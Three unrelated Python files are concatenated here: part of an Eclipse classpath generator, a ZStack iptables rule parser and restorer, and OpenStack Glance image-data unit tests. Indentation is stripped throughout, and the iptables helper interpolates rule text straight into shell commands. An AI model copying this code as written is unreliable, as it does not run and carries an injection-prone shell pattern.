def impl_create_javaproject(self, javasrcpath, javalibpath):
# create a .classpath file for java usage
doc = Document()
javaproject = doc.createElement('classpath')
if javasrcpath:
for i in javasrcpath:
self.add(doc, javaproject, 'classpathentry',
{'kind': 'src', 'path': i})
if javalibpath:
for i in javalibpath:
self.add(doc, javaproject, 'classpathentry',
{'kind': 'lib', 'path': i})
self.add(doc, javaproject, 'classpathentry', {'kind': 'con', 'path': 'org.eclipse.jdt.launching.JRE_CONTAINER'})
self.add(doc, javaproject, 'classpathentry', {'kind': 'output', 'path': self.bldnode.name })
doc.appendChild(javaproject)
return doc
def addDictionary(self, doc, parent, k, v):
dictionary = self.add(doc, parent, 'dictionary')
self.add(doc, dictionary, 'key', k)
self.add(doc, dictionary, 'value', v)
return dictionary
def addTarget(self, doc, buildTargets, executable, name, buildTarget, runAllBuilders=True):
target = self.add(doc, buildTargets, 'target',
{'name': name,
'path': '',
'targetID': oe_cdt + '.build.MakeTargetBuilder'})
self.add(doc, target, 'buildCommand', executable)
self.add(doc, target, 'buildArguments', None)
self.add(doc, target, 'buildTarget', buildTarget)
self.add(doc, target, 'stopOnError', 'true')
self.add(doc, target, 'useDefaultCommand', 'false')
self.add(doc, target, 'runAllBuilders', str(runAllBuilders).lower())
def add(self, doc, parent, tag, value = None):
el = doc.createElement(tag)
if (value):
if type(value) == type(str()):
el.appendChild(doc.createTextNode(value))
elif type(value) == type(dict()):
self.setAttributes(el, value)
parent.appendChild(el)
return el
def setAttributes(self, node, attrs):
for k, v in attrs.items():
node.setAttribute(k, v)
|
|
'''
@author: frank
'''
import os
from zstacklib.utils import shell
from zstacklib.utils import linux
from zstacklib.utils import log
from zstacklib.utils import ordered_set
from pyparsing import *
logger = log.get_logger(__name__)
class IPTablesError(Exception):
'''iptables error'''
class Node(object):
def __init__(self):
self.name = None
self.identity = None
self.parent = None
self.children = []
def add_child(self, node):
self.children.append(node)
node.parent = self
def get_child_by_name(self, name):
for c in self.children:
if c.name == name:
return c
return None
def get_child_by_identity(self, identity):
for c in self.children:
if c.identity == identity:
return c
return None
def insert_child_before(self, n1, n2):
pos = self.children.index(n1)
self.children.insert(pos-1, n2)
n2.parent = self
def insert_child_after(self, n1, n2):
pos = self.children.index(n1)
self.children.insert(pos+1, n2)
n2.parent = self
def insert_child_all_after_by_name(self, name, node):
n = self.search_by_name(name)
if not n:
raise ValueError('cannot find node[name:%s]' % name)
n.parent.insert_child_after(n, node)
def insert_child_all_after_by_identity(self, identity, node):
n = self.search_by_identity(identity)
if not n:
raise ValueError('cannot find node[identity:%s]' % identity)
n.parent.insert_child_after(n, node)
def insert_child_all_before_by_name(self, name, node):
n = self.search_by_name(name)
if not n:
raise ValueError('cannot find node[name:%s]' % name)
n.parent.insert_child_before(n, node)
def insert_child_all_before_by_identity(self, identity, node):
n = self.search_by_identity(identity)
if not n:
raise ValueError('cannot find node[identity:%s]' % identity)
n.parent.insert_child_before(n, node)
def delete_child_by_name(self, name):
c = self.get_child_by_name(name)
if c:
self.children.remove(c)
c.parent = None
def delete_child_by_identity(self, identity):
c = self.get_child_by_identity(identity)
if c:
self.children.remove(c)
c.parent = None
def walk(self, callback, data=None):
def do_walk(node):
if callback(node, data):
return node
for n in node.children:
ret = do_walk(n)
if ret:
return ret
return do_walk(self)
def walk_all(self, callback, data=None):
ret = []
def do_walk_all(node):
if callback(node, data):
ret.append(node)
for n in node.children:
do_walk_all(n)
do_walk_all(self)
return ret
def search_by_name(self, name):
return self.walk((lambda n, u: n.name == name), None)
def search_by_identity(self, identity):
return self.walk((lambda n, u: n.identity == identity), None)
def search_all_by_name(self, name):
return self.walk_all((lambda n, u: n.name == name), None)
def search_all_by_identity(self, identity):
return self.walk_all((lambda n, u: n.identity == identity), None)
def delete_all_by_name(self, name):
lst = self.search_all_by_name(name)
for l in lst:
l.delete()
def delete_all_by_identity(self, identity):
lst = self.search_all_by_identity(identity)
for l in lst:
l.delete()
def delete(self):
if self.parent:
self.parent.children.remove(self)
self.parent = None
def __str__(self):
return self.identity
class IPTableTable(Node):
def __init__(self):
super(IPTableTable, self).__init__()
def __str__(self):
# if the chain has been deleted, don't add the its counter
lst = ['%s' % self.identity]
for chain in self.children:
lst.append(chain.counter_str)
for chain in self.children:
cstr = str(chain)
if cstr == '':
continue
lst.append(cstr)
lst.append('COMMIT')
return '\n'.join(lst)
class IPTableChain(Node):
def __init__(self):
super(IPTableChain, self).__init__()
self.counter_str = None
def delete_all_rules(self):
self.children = []
def __str__(self):
if not self.children:
return ''
rules = []
for r in self.children:
rules.append(r)
def sort(r1, r2):
return r1.order - r2.order
rules = sorted(rules, sort, reverse=True)
lst = ordered_set.OrderedSet()
for r in rules:
lst.add(str(r))
return '\n'.join(lst)
class IPTableRule(Node):
def __init__(self):
super(IPTableRule, self).__init__()
self.order = 0
def __str__(self):
return self.identity
class IPTables(Node):
NAT_TABLE_NAME = 'nat'
FILTER_TABLE_NAME = 'filter'
MANGLE_TABLE_NAME = 'mangle'
SECURITY_TABLE_NAME = 'security'
RAW_TABLE_NAME = 'raw'
def __init__(self):
super(IPTables, self).__init__()
self._parser = None
self._current_table = None
self._filter_table = None
self._nat_table = None
self._mangle_table = None
self._raw_table = None
self._security_table = None
def get_table(self, table_name=FILTER_TABLE_NAME):
return self.get_child_by_name(table_name)
def get_chain(self, chain_name, table_name=FILTER_TABLE_NAME):
tbl = self.get_child_by_name(table_name)
if not tbl:
return None
return tbl.get_child_by_name(chain_name)
def _create_table_if_not_exists(self, table_name):
table_name = table_name.strip()
table_identity = '*%s' % table_name
table = self.get_child_by_identity(table_identity)
if not table:
table = IPTableTable()
table.identity = table_identity
table.name = table_name
table.parent = self
self.add_child(table)
self._current_table = table
if table_name == self.NAT_TABLE_NAME:
self._nat_table = table
elif table_name == self.FILTER_TABLE_NAME:
self._filter_table = table
elif table_name == self.MANGLE_TABLE_NAME:
self._mangle_table = table
elif table_name == self.SECURITY_TABLE_NAME:
self._security_table = table
elif table_name == self.RAW_TABLE_NAME:
self._raw_table = table
else:
assert 0, 'unknown table name: %s' % table_name
def _parse_table_action(self, tokens):
table_name = tokens[1]
self._create_table_if_not_exists(table_name)
def _parse_commit_action(self, tokens):
self._current_table = None
def _create_chain_if_not_exists(self, chain_name, counter_str=None):
chain = self._current_table.get_child_by_name(chain_name)
if not chain:
chain = IPTableChain()
chain.parent = self._current_table
chain.name = chain_name
chain.identity = chain_name
if not counter_str:
counter_str = ':%s - [0:0]' % chain_name
chain.counter_str = counter_str
self._current_table.add_child(chain)
return chain
def _parse_counter_action(self, tokens):
chain_name = tokens[1]
prefix = ':%s' % chain_name
lst = [prefix]
lst.extend(tokens[2:])
counter_str = ' '.join(lst)
self._create_chain_if_not_exists(chain_name, counter_str)
def _add_rule(self, chain_name, rule_identity, order=0):
chain = self._create_chain_if_not_exists(chain_name)
rule = IPTableRule()
rule_identity = self._normalize_rule(rule_identity)
rule.name = rule_identity
rule.identity = rule_identity
rule.parent = chain
rule.order = order
chain.add_child(rule)
def _parse_rule_action(self, tokens):
chain_name = tokens[1]
self._add_rule(chain_name, ' '.join(tokens))
def _construct_pyparsing(self):
if self._parser:
return
table = Word('*') + Word(alphas)
table.setParseAction(self._parse_table_action)
chain_name = Word(printables + '.-_+=%$#')
counter = Word(':') + chain_name + restOfLine
counter.setParseAction(self._parse_counter_action)
comment = Word('#') + restOfLine
rule = Word('-A') + chain_name + restOfLine
rule.setParseAction(self._parse_rule_action)
commit = Word('COMMIT')
commit.setParseAction(self._parse_commit_action)
self._parser = table | counter | comment | rule | commit
@staticmethod
def find_target_in_rule(rule):
#TODO: find pyparsing way
if isinstance(rule, IPTableRule):
rs = str(rule).split()
else:
rs = rule.split()
target = None
for r in rs:
if r == '-j':
target = rs[rs.index(r) + 1]
return target
@staticmethod
def is_target_in_rule(rule, target):
ret = IPTables.find_target_in_rule(rule)
return target == ret
@staticmethod
def find_target_chain_name_in_rule(rule):
target = IPTables.find_target_in_rule(rule)
# assume target in upper case are default targets
if target and target.isupper():
target = None
return target
def _reset(self):
self.children = []
self._current_table = None
self._nat_table = None
self._filter_table = None
self._mangle_table = None
def _from_iptables_save(self, txt):
self._reset()
self._construct_pyparsing()
for l in txt.split('\n'):
l = l.strip('\n').strip('\r').strip('\t').strip()
if not l:
continue
self._parser.parseString(l)
def iptables_save(self):
out = shell.call('/sbin/iptables-save')
self._from_iptables_save(out)
def __str__(self):
lst = []
for table in self.children:
lst.append(str(table))
# iptables-save needs a new line as ending
lst.append('')
return '\n'.join(lst)
def _cleanup_empty_chain(self):
def _is_chain_not_targeted(chain,table):
need_deleted = True
for chain2 in table.children:
if chain2.children:
for rule1 in chain2.children:
if IPTables.is_target_in_rule(rule1,chain.name):
need_deleted = False
break
return need_deleted
def _clean_chain_having_no_rules():
chains_to_delete = []
for t in self.children:
for c in t.children:
if not c.children:
if _is_chain_not_targeted(c,t):
chains_to_delete.append(c)
empty_chain_names = []
for c in chains_to_delete:
if c.name in ['INPUT', 'FORWARD', 'OUTPUT', 'PREROUTING', 'POSTROUTING']:
continue
empty_chain_names.append(c.name)
c.delete()
return empty_chain_names
def _clean_rule_having_stale_target_chain():
alive_chain_names = []
for t in self.children:
for c in t.children:
alive_chain_names.append(c.name)
def walker(rule, data):
if not isinstance(rule, IPTableRule):
return False
chain_name = self.find_target_chain_name_in_rule(rule.identity)
if chain_name and (chain_name not in alive_chain_names):
return True
return False
return self.walk_all(walker, None)
empty_chain_names = _clean_chain_having_no_rules()
logger.debug('removed empty chains:%s' % empty_chain_names)
rules_to_delete = _clean_rule_having_stale_target_chain()
for r in rules_to_delete:
logger.debug('delete rule[%s] which has defunct target' % str(r))
r.delete()
def _sort_chains(self, sys_chain_names, chains, sort_func):
all_chains = []
user_chains = []
for chain in chains:
if chain.name in sys_chain_names:
all_chains.append(chain)
else:
user_chains.append(chain)
user_chains = sorted(user_chains, sort_func)
all_chains.extend(user_chains)
return all_chains
def _sort_chain_in_filter_table(self, sort_func):
if self._filter_table is None:
return
self._filter_table.children = self._sort_chains(['INPUT', 'FORWARD', 'OUTPUT'], self._filter_table.children, sort_func)
def _sort_chain_in_nat_table(self, sort_func):
if self._nat_table is None:
return
self._nat_table.children = self._sort_chains(['PREROUTING', 'POSTROUTING', 'OUTPUT'], self._nat_table.children, sort_func)
def _sort_chain_in_mangle_table(self, sort_func):
if self._mangle_table is None:
return
self._mangle_table.children = self._sort_chains(['PREROUTING', 'INPUT', 'FORWARD', 'OUTPUT', 'POSTROUTING'],
self._mangle_table.children, sort_func)
def cleanup_unused_chain(self, is_cleanup, table_name=FILTER_TABLE_NAME, data=None):
table = self.get_child_by_name(table_name)
if not table:
return
sys_chain_names = ['INPUT', 'FORWARD', 'OUTPUT', 'PREROUTING', 'POSTROUTING']
to_del = []
for chain in table.children:
if chain.name in sys_chain_names:
continue
if is_cleanup(chain, data):
to_del.append(chain.name)
for cname in to_del:
table.delete_child_by_name(cname)
def _to_iptables_string(self, marshall_func=None, sort_nat_func=None, sort_filter_func=None, sort_mangle_func=None):
self._cleanup_empty_chain()
if sort_filter_func:
self._sort_chain_in_filter_table(sort_filter_func)
if sort_mangle_func:
self._sort_chain_in_mangle_table(sort_mangle_func)
if sort_nat_func:
self._sort_chain_in_nat_table(sort_nat_func)
def make_reject_rule_last(r1, r2):
if self.is_target_in_rule(r1, 'REJECT'):
return 1
if self.is_target_in_rule(r2, 'REJECT'):
return -1
return 0
for c in self._filter_table.children:
c.children = sorted(c.children, make_reject_rule_last)
content = str(self)
if marshall_func:
content = marshall_func(content)
return content
def iptable_restore(self, marshall_func=None, sort_nat_func=None, sort_filter_func=None, sort_mangle_func=None):
content = self._to_iptables_string(marshall_func, sort_nat_func, sort_filter_func, sort_mangle_func)
f = linux.write_to_temp_file(content)
try:
shell.call('/sbin/iptables-restore < %s' % f)
except Exception as e:
err ='''Failed to apply iptables rules:
shell error description:
%s
iptable rules:
%s
''' % (str(e), content)
raise IPTablesError(err)
finally:
os.remove(f)
@staticmethod
def from_iptables_save():
ipt = IPTables()
ipt.iptables_save()
return ipt
def _normalize_rule(self, rule):
return ' '.join(rule.strip().split())
def add_rule(self, rule, table_name=FILTER_TABLE_NAME, order=0):
if table_name not in [self.FILTER_TABLE_NAME, self.NAT_TABLE_NAME, self.MANGLE_TABLE_NAME]:
raise IPTablesError('unknown table name[%s]' % table_name)
self._create_table_if_not_exists(table_name)
chain_name = Word(printables + '-_+=%$#')
rule_p = Word('-A') + chain_name + restOfLine
res = rule_p.parseString(rule)
self._add_rule(res[1], rule, order)
def remove_rule(self, rule_str):
rule_str = self._normalize_rule(rule_str)
self.delete_all_by_identity(rule_str)
def search_all_rule(self, rule_str):
rule_str = self._normalize_rule(rule_str)
return self.search_all_by_identity(rule_str)
def search_rule(self, rule_str):
rule_str = self._normalize_rule(rule_str)
return self.search_by_identity(rule_str)
def delete_chain(self, chain_name, table_name=FILTER_TABLE_NAME):
table = self.get_child_by_name(table_name)
if not table:
return
table.delete_child_by_name(chain_name)
def from_iptables_save():
return IPTables.from_iptables_save()
def insert_single_rule_to_filter_table(rule):
insert_rule = rule.replace('-A', '-I')
shell.call("/sbin/iptables-save | grep -- '{0}' > /dev/null || iptables {1}".format(rule, insert_rule))
if __name__ == '__main__':
ipt = IPTables.from_iptables_save()
rule1 = '-A INPUT -i virbr0 -p udp -m udp --dport 99 -j ACCEPT'
#rule2 = '-A xxxx -i virbr0 -p udp -m udp --dport 100 -j ACCEPT'
#ipt.remove_rule(rule1)
#ipt.add_rule(rule2)
#ipt.iptable_restore()
#ipt.delete_chain('INPUT')
ipt.add_rule(rule1)
ipt.add_rule(rule1)
ipt.add_rule(rule1)
ipt.iptable_restore()
ipt.iptables_save()
print ipt
|
|
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import glance_store
import mock
import six
import webob
import glance.api.policy
import glance.api.v2.image_data
from glance.common import exception
from glance.common import wsgi
from glance.tests.unit import base
import glance.tests.unit.utils as unit_test_utils
import glance.tests.utils as test_utils
class Raise(object):
def __init__(self, exc):
self.exc = exc
def __call__(self, *args, **kwargs):
raise self.exc
class FakeImage(object):
def __init__(self, image_id=None, data=None, checksum=None, size=0,
virtual_size=0, locations=None, container_format='bear',
disk_format='rawr', status=None):
self.image_id = image_id
self.data = data
self.checksum = checksum
self.size = size
self.virtual_size = virtual_size
self.locations = locations
self.container_format = container_format
self.disk_format = disk_format
self._status = status
@property
def status(self):
return self._status
@status.setter
def status(self, value):
if isinstance(self._status, BaseException):
raise self._status
else:
self._status = value
def get_data(self, *args, **kwargs):
return self.data
def set_data(self, data, size=None):
self.data = ''.join(data)
self.size = size
self.status = 'modified-by-fake'
class FakeImageRepo(object):
def __init__(self, result=None):
self.result = result
def get(self, image_id):
if isinstance(self.result, BaseException):
raise self.result
else:
return self.result
def save(self, image, from_state=None):
self.saved_image = image
class FakeGateway(object):
def __init__(self, repo):
self.repo = repo
def get_repo(self, context):
return self.repo
class TestImagesController(base.StoreClearingUnitTest):
def setUp(self):
super(TestImagesController, self).setUp()
self.config(verbose=True, debug=True)
self.image_repo = FakeImageRepo()
self.gateway = FakeGateway(self.image_repo)
self.controller = glance.api.v2.image_data.ImageDataController(
gateway=self.gateway)
def test_download(self):
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd',
status='active',
locations=[{'url': 'http://example.com/image',
'metadata': {}, 'status': 'active'}])
self.image_repo.result = image
image = self.controller.download(request, unit_test_utils.UUID1)
self.assertEqual('abcd', image.image_id)
def test_download_deactivated(self):
request = unit_test_utils.get_fake_request(is_admin=False)
image = FakeImage('abcd',
status='deactivated',
locations=[{'url': 'http://example.com/image',
'metadata': {}, 'status': 'active'}])
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPForbidden, self.controller.download,
request, str(uuid.uuid4()))
request = unit_test_utils.get_fake_request(is_admin=True)
image = FakeImage('abcd',
status='deactivated',
locations=[{'url': 'http://example.com/image',
'metadata': {}, 'status': 'active'}])
self.image_repo.result = image
image = self.controller.download(request, unit_test_utils.UUID1)
self.assertEqual('abcd', image.image_id)
def test_download_is_not_active(self):
state = ['queued', 'deleted', 'saving', 'killed', 'pending_delete']
for st in state:
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd',
status=st,
locations=[{'url': 'http://example.com/image',
'metadata': {}, 'status': 'active'}])
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.download,
request, str(uuid.uuid4()))
def test_download_no_location(self):
# NOTE(mclaren): NoContent will be raised by the ResponseSerializer
# That's tested below.
request = unit_test_utils.get_fake_request()
self.image_repo.result = FakeImage('abcd', status='active')
image = self.controller.download(request, unit_test_utils.UUID2)
self.assertEqual('abcd', image.image_id)
def test_download_non_existent_image(self):
request = unit_test_utils.get_fake_request()
self.image_repo.result = exception.NotFound()
self.assertRaises(webob.exc.HTTPNotFound, self.controller.download,
request, str(uuid.uuid4()))
def test_download_forbidden(self):
request = unit_test_utils.get_fake_request()
self.image_repo.result = exception.Forbidden()
self.assertRaises(webob.exc.HTTPForbidden, self.controller.download,
request, str(uuid.uuid4()))
def test_download_ok_when_get_image_location_forbidden(self):
class ImageLocations(object):
def __len__(self):
raise exception.Forbidden()
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd', status='active')
self.image_repo.result = image
image.locations = ImageLocations()
image = self.controller.download(request, unit_test_utils.UUID1)
self.assertEqual('abcd', image.image_id)
def test_upload(self):
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd')
self.image_repo.result = image
self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
self.assertEqual('YYYY', image.data)
self.assertEqual(4, image.size)
def test_upload_status(self):
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd')
self.image_repo.result = image
insurance = {'called': False}
def read_data():
insurance['called'] = True
self.assertEqual('saving', self.image_repo.saved_image.status)
yield 'YYYY'
self.controller.upload(request, unit_test_utils.UUID2,
read_data(), None)
self.assertTrue(insurance['called'])
self.assertEqual('modified-by-fake',
self.image_repo.saved_image.status)
def test_upload_no_size(self):
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd')
self.image_repo.result = image
self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', None)
self.assertEqual('YYYY', image.data)
self.assertIsNone(image.size)
def test_upload_invalid(self):
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd')
image.status = ValueError()
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.upload,
request, unit_test_utils.UUID1, 'YYYY', 4)
def test_upload_with_expired_token(self):
def side_effect(image, from_state=None):
if from_state == 'saving':
raise exception.NotAuthenticated()
mocked_save = mock.Mock(side_effect=side_effect)
mocked_delete = mock.Mock()
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd')
image.delete = mocked_delete
self.image_repo.result = image
self.image_repo.save = mocked_save
self.assertRaises(webob.exc.HTTPUnauthorized, self.controller.upload,
request, unit_test_utils.UUID1, 'YYYY', 4)
self.assertEqual(3, mocked_save.call_count)
mocked_delete.assert_called_once_with()
def test_upload_non_existent_image_during_save_initiates_deletion(self):
def fake_save_not_found(self):
raise exception.ImageNotFound()
def fake_save_conflict(self):
raise exception.Conflict()
for fun in [fake_save_not_found, fake_save_conflict]:
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd', locations=['http://example.com/image'])
self.image_repo.result = image
self.image_repo.save = fun
image.delete = mock.Mock()
self.assertRaises(webob.exc.HTTPGone, self.controller.upload,
request, str(uuid.uuid4()), 'ABC', 3)
self.assertTrue(image.delete.called)
def test_upload_non_existent_image_raises_image_not_found_exception(self):
def fake_save(self):
raise exception.ImageNotFound()
def fake_delete():
raise exception.ImageNotFound()
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd', locations=['http://example.com/image'])
self.image_repo.result = image
self.image_repo.save = fake_save
image.delete = fake_delete
self.assertRaises(webob.exc.HTTPGone, self.controller.upload,
request, str(uuid.uuid4()), 'ABC', 3)
def test_upload_non_existent_image_raises_store_not_found_exception(self):
def fake_save(self):
raise glance_store.NotFound()
def fake_delete():
raise exception.ImageNotFound()
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd', locations=['http://example.com/image'])
self.image_repo.result = image
self.image_repo.save = fake_save
image.delete = fake_delete
self.assertRaises(webob.exc.HTTPGone, self.controller.upload,
request, str(uuid.uuid4()), 'ABC', 3)
def test_upload_non_existent_image_before_save(self):
request = unit_test_utils.get_fake_request()
self.image_repo.result = exception.NotFound()
self.assertRaises(webob.exc.HTTPNotFound, self.controller.upload,
request, str(uuid.uuid4()), 'ABC', 3)
def test_upload_data_exists(self):
request = unit_test_utils.get_fake_request()
image = FakeImage()
exc = exception.InvalidImageStatusTransition(cur_status='active',
new_status='queued')
image.set_data = Raise(exc)
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPConflict, self.controller.upload,
request, unit_test_utils.UUID1, 'YYYY', 4)
def test_upload_storage_full(self):
request = unit_test_utils.get_fake_request()
image = FakeImage()
image.set_data = Raise(glance_store.StorageFull)
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.upload,
request, unit_test_utils.UUID2, 'YYYYYYY', 7)
def test_upload_signature_verification_fails(self):
request = unit_test_utils.get_fake_request()
image = FakeImage()
image.set_data = Raise(exception.SignatureVerificationError)
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.upload,
request, unit_test_utils.UUID1, 'YYYY', 4)
self.assertEqual('killed', self.image_repo.saved_image.status)
def test_image_size_limit_exceeded(self):
request = unit_test_utils.get_fake_request()
image = FakeImage()
image.set_data = Raise(exception.ImageSizeLimitExceeded)
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.upload,
request, unit_test_utils.UUID1, 'YYYYYYY', 7)
def test_upload_storage_quota_full(self):
request = unit_test_utils.get_fake_request()
self.image_repo.result = exception.StorageQuotaFull("message")
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.upload,
request, unit_test_utils.UUID1, 'YYYYYYY', 7)
def test_upload_storage_forbidden(self):
request = unit_test_utils.get_fake_request(user=unit_test_utils.USER2)
image = FakeImage()
image.set_data = Raise(exception.Forbidden)
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPForbidden, self.controller.upload,
request, unit_test_utils.UUID2, 'YY', 2)
def test_upload_storage_internal_error(self):
request = unit_test_utils.get_fake_request()
self.image_repo.result = exception.ServerError()
self.assertRaises(exception.ServerError,
self.controller.upload,
request, unit_test_utils.UUID1, 'ABC', 3)
def test_upload_storage_write_denied(self):
request = unit_test_utils.get_fake_request(user=unit_test_utils.USER3)
image = FakeImage()
image.set_data = Raise(glance_store.StorageWriteDenied)
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPServiceUnavailable,
self.controller.upload,
request, unit_test_utils.UUID2, 'YY', 2)
def test_upload_storage_store_disabled(self):
"""Test that uploading an image file raises StoreDisabled exception"""
request = unit_test_utils.get_fake_request(user=unit_test_utils.USER3)
image = FakeImage()
image.set_data = Raise(glance_store.StoreAddDisabled)
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPGone,
self.controller.upload,
request, unit_test_utils.UUID2, 'YY', 2)
@mock.patch("glance.common.trust_auth.TokenRefresher")
def test_upload_with_trusts(self, mock_refresher):
"""Test that uploading with registry correctly uses trusts"""
# initialize trust environment
self.config(data_api='glance.db.registry.api')
refresher = mock.MagicMock()
mock_refresher.return_value = refresher
refresher.refresh_token.return_value = "fake_token"
# request an image upload
request = unit_test_utils.get_fake_request()
request.environ['keystone.token_auth'] = mock.MagicMock()
request.environ['keystone.token_info'] = {
'token': {
'roles': [{'name': 'FakeRole', 'id': 'FakeID'}]
}
}
image = FakeImage('abcd')
self.image_repo.result = image
mock_fake_save = mock.Mock()
mock_fake_save.side_effect = [None, exception.NotAuthenticated, None]
temp_save = FakeImageRepo.save
# mocking save to raise NotAuthenticated on the second call
FakeImageRepo.save = mock_fake_save
self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
# check image data
self.assertEqual('YYYY', image.data)
self.assertEqual(4, image.size)
FakeImageRepo.save = temp_save
# check that token has been correctly acquired and deleted
mock_refresher.assert_called_once_with(
request.environ['keystone.token_auth'],
request.context.tenant, ['FakeRole'])
refresher.refresh_token.assert_called_once_with()
refresher.release_resources.assert_called_once_with()
self.assertEqual("fake_token", request.context.auth_token)
@mock.patch("glance.common.trust_auth.TokenRefresher")
def test_upload_with_trusts_fails(self, mock_refresher):
"""Test upload with registry if trust was not successfully created"""
# initialize trust environment
self.config(data_api='glance.db.registry.api')
mock_refresher().side_effect = Exception()
# request an image upload
request = unit_test_utils.get_fake_request()
image = FakeImage('abcd')
self.image_repo.result = image
self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
# check image data
self.assertEqual('YYYY', image.data)
self.assertEqual(4, image.size)
# check that the token has not been updated
self.assertEqual(0, mock_refresher().refresh_token.call_count)
def _test_upload_download_prepare_notification(self):
request = unit_test_utils.get_fake_request()
self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
output = self.controller.download(request, unit_test_utils.UUID2)
output_log = self.notifier.get_logs()
prepare_payload = output['meta'].copy()
prepare_payload['checksum'] = None
prepare_payload['size'] = None
prepare_payload['virtual_size'] = None
prepare_payload['location'] = None
prepare_payload['status'] = 'queued'
del prepare_payload['updated_at']
prepare_log = {
'notification_type': "INFO",
'event_type': "image.prepare",
'payload': prepare_payload,
}
self.assertEqual(3, len(output_log))
prepare_updated_at = output_log[0]['payload']['updated_at']
del output_log[0]['payload']['updated_at']
self.assertTrue(prepare_updated_at <= output['meta']['updated_at'])
self.assertEqual(prepare_log, output_log[0])
def _test_upload_download_upload_notification(self):
request = unit_test_utils.get_fake_request()
self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
output = self.controller.download(request, unit_test_utils.UUID2)
output_log = self.notifier.get_logs()
upload_payload = output['meta'].copy()
upload_log = {
'notification_type': "INFO",
'event_type': "image.upload",
'payload': upload_payload,
}
self.assertEqual(3, len(output_log))
self.assertEqual(upload_log, output_log[1])
def _test_upload_download_activate_notification(self):
request = unit_test_utils.get_fake_request()
self.controller.upload(request, unit_test_utils.UUID2, 'YYYY', 4)
output = self.controller.download(request, unit_test_utils.UUID2)
output_log = self.notifier.get_logs()
activate_payload = output['meta'].copy()
activate_log = {
'notification_type': "INFO",
'event_type': "image.activate",
'payload': activate_payload,
}
self.assertEqual(3, len(output_log))
self.assertEqual(activate_log, output_log[2])
def test_restore_image_when_upload_failed(self):
request = unit_test_utils.get_fake_request()
image = FakeImage('fake')
image.set_data = Raise(glance_store.StorageWriteDenied)
self.image_repo.result = image
self.assertRaises(webob.exc.HTTPServiceUnavailable,
self.controller.upload,
request, unit_test_utils.UUID2, 'ZZZ', 3)
self.assertEqual('queued', self.image_repo.saved_image.status)
class TestImageDataDeserializer(test_utils.BaseTestCase):
def setUp(self):
super(TestImageDataDeserializer, self).setUp()
self.deserializer = glance.api.v2.image_data.RequestDeserializer()
def test_upload(self):
request = unit_test_utils.get_fake_request()
request.headers['Content-Type'] = 'application/octet-stream'
request.body = b'YYY'
request.headers['Content-Length'] = 3
output = self.deserializer.upload(request)
data = output.pop('data')
self.assertEqual(b'YYY', data.read())
expected = {'size': 3}
self.assertEqual(expected, output)
def test_upload_chunked(self):
request = unit_test_utils.get_fake_request()
request.headers['Content-Type'] = 'application/octet-stream'
# If we use body_file, webob assumes we want to do a chunked upload,
# ignoring the Content-Length header
request.body_file = six.StringIO('YYY')
output = self.deserializer.upload(request)
data = output.pop('data')
self.assertEqual('YYY', data.read())
expected = {'size': None}
self.assertEqual(expected, output)
def test_upload_chunked_with_content_length(self):
request = unit_test_utils.get_fake_request()
request.headers['Content-Type'] = 'application/octet-stream'
request.body_file = six.BytesIO(b'YYY')
# The deserializer shouldn't care if the Content-Length is
# set when the user is attempting to send chunked data.
request.headers['Content-Length'] = 3
output = self.deserializer.upload(request)
data = output.pop('data')
self.assertEqual(b'YYY', data.read())
expected = {'size': 3}
self.assertEqual(expected, output)
def test_upload_with_incorrect_content_length(self):
request = unit_test_utils.get_fake_request()
request.headers['Content-Type'] = 'application/octet-stream'
# The deserializer shouldn't care if the Content-Length and
# actual request body length differ. That job is left up
# to the controller
request.body = b'YYY'
request.headers['Content-Length'] = 4
output = self.deserializer.upload(request)
data = output.pop('data')
self.assertEqual(b'YYY', data.read())
expected = {'size': 4}
self.assertEqual(expected, output)
def test_upload_wrong_content_type(self):
request = unit_test_utils.get_fake_request()
request.headers['Content-Type'] = 'application/json'
request.body = b'YYYYY'
self.assertRaises(webob.exc.HTTPUnsupportedMediaType,
self.deserializer.upload, request)
request = unit_test_utils.get_fake_request()
request.headers['Content-Type'] = 'application/octet-st'
request.body = b'YYYYY'
self.assertRaises(webob.exc.HTTPUnsupportedMediaType,
self.deserializer.upload, request)
class TestImageDataSerializer(test_utils.BaseTestCase):
def setUp(self):
super(TestImageDataSerializer, self).setUp()
self.serializer = glance.api.v2.image_data.ResponseSerializer()
def test_download(self):
request = wsgi.Request.blank('/')
request.environ = {}
response = webob.Response()
response.request = request
image = FakeImage(size=3, data=[b'Z', b'Z', b'Z'])
self.serializer.download(response, image)
self.assertEqual(b'ZZZ', response.body)
